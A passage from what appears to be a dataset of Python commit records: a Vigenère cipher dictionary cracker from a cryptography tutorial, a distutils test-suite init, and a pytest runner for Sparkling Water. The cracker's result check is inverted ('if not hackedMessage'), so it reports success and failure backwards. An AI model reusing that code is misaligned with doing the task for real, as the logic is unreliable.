else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open('dictionary.txt')
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
DICTIONARY_FILE = "/home/jose/PycharmProjects/python-tutorials/books/CrackingCodesWithPython/Chapter11/dictionary.txt"
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if not hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open(DICTIONARY_FILE)
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
Update vigenereDicitonaryHacker: added full path to dictionary file
|
Update vigenereDicitonaryHacker: added full path to dictionary file
|
Python
|
mit
|
JoseALermaIII/python-tutorials,JoseALermaIII/python-tutorials
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if not hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open('dictionary.txt')
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
Update vigenereDicitonaryHacker: added full path to dictionary file
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
DICTIONARY_FILE = "/home/jose/PycharmProjects/python-tutorials/books/CrackingCodesWithPython/Chapter11/dictionary.txt"
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if not hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open(DICTIONARY_FILE)
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
<commit_before># Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if not hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open('dictionary.txt')
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
<commit_msg>Update vigenereDicitonaryHacker: added full path to dictionary file<commit_after>
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
DICTIONARY_FILE = "/home/jose/PycharmProjects/python-tutorials/books/CrackingCodesWithPython/Chapter11/dictionary.txt"
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if not hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open(DICTIONARY_FILE)
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if not hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open('dictionary.txt')
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
Update vigenereDicitonaryHacker: added full path to dictionary file# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
DICTIONARY_FILE = "/home/jose/PycharmProjects/python-tutorials/books/CrackingCodesWithPython/Chapter11/dictionary.txt"
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if not hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open(DICTIONARY_FILE)
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
<commit_before># Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if not hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open('dictionary.txt')
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
<commit_msg>Update vigenereDicitonaryHacker: added full path to dictionary file<commit_after># Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
DICTIONARY_FILE = "/home/jose/PycharmProjects/python-tutorials/books/CrackingCodesWithPython/Chapter11/dictionary.txt"
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if not hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open(DICTIONARY_FILE)
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
4b54a8a038d5f9f2ead224b030f87f393d57d40b
|
tests/__init__.py
|
tests/__init__.py
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
import warnings
from test.support import run_unittest
here = os.path.dirname(__file__) or os.curdir
def test_suite():
old_filters = warnings.filters[:]
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources which adds a
# warnings filter.
warnings.filters[:] = old_filters
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
from test.support import run_unittest
from test.support.warnings_helper import save_restore_warnings_filters
here = os.path.dirname(__file__) or os.curdir
def test_suite():
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources
# which adds a warnings filter.
with save_restore_warnings_filters():
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
Fix test_copyreg when numpy is installed (GH-20935)
|
bpo-41003: Fix test_copyreg when numpy is installed (GH-20935)
Fix test_copyreg when numpy is installed: test.pickletester now
saves/restores warnings.filters when importing numpy, to ignore
filters installed by numpy.
Add the save_restore_warnings_filters() function to the
test.support.warnings_helper module.
|
Python
|
mit
|
pypa/setuptools,pypa/setuptools,pypa/setuptools
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
import warnings
from test.support import run_unittest
here = os.path.dirname(__file__) or os.curdir
def test_suite():
old_filters = warnings.filters[:]
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources which adds a
# warnings filter.
warnings.filters[:] = old_filters
return suite
if __name__ == "__main__":
run_unittest(test_suite())
bpo-41003: Fix test_copyreg when numpy is installed (GH-20935)
Fix test_copyreg when numpy is installed: test.pickletester now
saves/restores warnings.filters when importing numpy, to ignore
filters installed by numpy.
Add the save_restore_warnings_filters() function to the
test.support.warnings_helper module.
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
from test.support import run_unittest
from test.support.warnings_helper import save_restore_warnings_filters
here = os.path.dirname(__file__) or os.curdir
def test_suite():
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources
# which adds a warnings filter.
with save_restore_warnings_filters():
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
<commit_before>"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
import warnings
from test.support import run_unittest
here = os.path.dirname(__file__) or os.curdir
def test_suite():
old_filters = warnings.filters[:]
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources which adds a
# warnings filter.
warnings.filters[:] = old_filters
return suite
if __name__ == "__main__":
run_unittest(test_suite())
<commit_msg>bpo-41003: Fix test_copyreg when numpy is installed (GH-20935)
Fix test_copyreg when numpy is installed: test.pickletester now
saves/restores warnings.filters when importing numpy, to ignore
filters installed by numpy.
Add the save_restore_warnings_filters() function to the
test.support.warnings_helper module.<commit_after>
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
from test.support import run_unittest
from test.support.warnings_helper import save_restore_warnings_filters
here = os.path.dirname(__file__) or os.curdir
def test_suite():
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources
# which adds a warnings filter.
with save_restore_warnings_filters():
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
import warnings
from test.support import run_unittest
here = os.path.dirname(__file__) or os.curdir
def test_suite():
old_filters = warnings.filters[:]
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources which adds a
# warnings filter.
warnings.filters[:] = old_filters
return suite
if __name__ == "__main__":
run_unittest(test_suite())
bpo-41003: Fix test_copyreg when numpy is installed (GH-20935)
Fix test_copyreg when numpy is installed: test.pickletester now
saves/restores warnings.filters when importing numpy, to ignore
filters installed by numpy.
Add the save_restore_warnings_filters() function to the
test.support.warnings_helper module."""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
from test.support import run_unittest
from test.support.warnings_helper import save_restore_warnings_filters
here = os.path.dirname(__file__) or os.curdir
def test_suite():
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources
# which adds a warnings filter.
with save_restore_warnings_filters():
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
<commit_before>"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
import warnings
from test.support import run_unittest
here = os.path.dirname(__file__) or os.curdir
def test_suite():
old_filters = warnings.filters[:]
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources which adds a
# warnings filter.
warnings.filters[:] = old_filters
return suite
if __name__ == "__main__":
run_unittest(test_suite())
<commit_msg>bpo-41003: Fix test_copyreg when numpy is installed (GH-20935)
Fix test_copyreg when numpy is installed: test.pickletester now
saves/restores warnings.filters when importing numpy, to ignore
filters installed by numpy.
Add the save_restore_warnings_filters() function to the
test.support.warnings_helper module.<commit_after>"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
from test.support import run_unittest
from test.support.warnings_helper import save_restore_warnings_filters
here = os.path.dirname(__file__) or os.curdir
def test_suite():
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources
# which adds a warnings filter.
with save_restore_warnings_filters():
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
19656decb756db364d012cbfb13d0ddf30e15bae
|
py/tests/test_runner.py
|
py/tests/test_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.putenv("PYTHONPATH", path)
os.putenv('PYSPARK_DRIVER_PYTHON', sys.executable)
os.putenv('PYSPARK_PYTHON', sys.executable)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
Fix running python tests by changing the env directly
|
[SW-1610][FollowUp] Fix running python tests by changing the env directly
(cherry picked from commit 0d808a100cd14fce9d4fba4f9cde6ad5315fbc12)
|
Python
|
apache-2.0
|
h2oai/sparkling-water,h2oai/sparkling-water,h2oai/sparkling-water,h2oai/sparkling-water
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
[SW-1610][FollowUp] Fix running python tests by changing the env directly
(cherry picked from commit 0d808a100cd14fce9d4fba4f9cde6ad5315fbc12)
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.putenv("PYTHONPATH", path)
os.putenv('PYSPARK_DRIVER_PYTHON', sys.executable)
os.putenv('PYSPARK_PYTHON', sys.executable)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
<commit_before>#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
<commit_msg>[SW-1610][FollowUp] Fix running python tests by changing the env directly
(cherry picked from commit 0d808a100cd14fce9d4fba4f9cde6ad5315fbc12)<commit_after>
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.putenv("PYTHONPATH", path)
os.putenv('PYSPARK_DRIVER_PYTHON', sys.executable)
os.putenv('PYSPARK_PYTHON', sys.executable)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
